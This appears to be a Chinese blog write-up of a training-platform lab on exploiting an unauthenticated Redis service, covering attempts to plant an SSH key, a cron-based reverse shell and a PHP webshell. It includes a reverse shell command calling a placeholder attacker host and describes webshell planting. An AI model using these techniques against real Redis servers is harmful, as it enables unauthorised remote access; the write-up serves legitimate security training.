---
title: redis未授权访问
date:  2018-10-02
tags: 
	- redis
	- Web
categories: 渗透
---
安全工程师"墨者"在单位办公内网做日常检测时，发现某部门为了方便运维人员做远程调试，将Redis默认端口6379通过防火墙映射在公网，并且没有做验证措施。
<!--more-->
## 0x00 目标和方向

### 目标

- 了解Redis应用的相关服务 
- 了解Redis基本命令的使用 
- 了解Redis在低权限下的渗透思路 

### 方向

远程连接Redis服务，进行漏洞利用，获取KEY。 

## 0x01 写入ssh公钥

原理：用kali生成公钥，并写入REDIS中，之后保存到/root/.ssh/下的authorized.keys 中

先连接上Redis

redis-cli -h 219.153.49.228 -p 40211

结果在设置Redis的保存路径时就出现了错误

![](墨者学院-redis未授权访问/one.png)

换种方法试试

## 0x02 定时任务反弹Shell

上一个尝试以没有权限失败告终，这次尝试估计也是没有权限，但姑且还是尝试了下

把Redis保存文件设置为/var/spool/cron/root

写入反弹shell的命令：

```bash
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/YOURIP/PORT 0>&1\n\n"
```

果然Save的时候出现错误

![](墨者学院-redis未授权访问/2.png)



## 0x03 在Web目录下写入WebShell

靶机给出的端口中另一个是Web端口，尝试着写入WebShell吧

先写一个PHP文件测试下

![](墨者学院-redis未授权访问/3.png)

访问http://219.153.49.228:44328/test.php,确实写进去东西了

![](墨者学院-redis未授权访问/4.png)

接下来就是写一句话，菜刀连接，拿到KEY

![](墨者学院-redis未授权访问/cat.png)

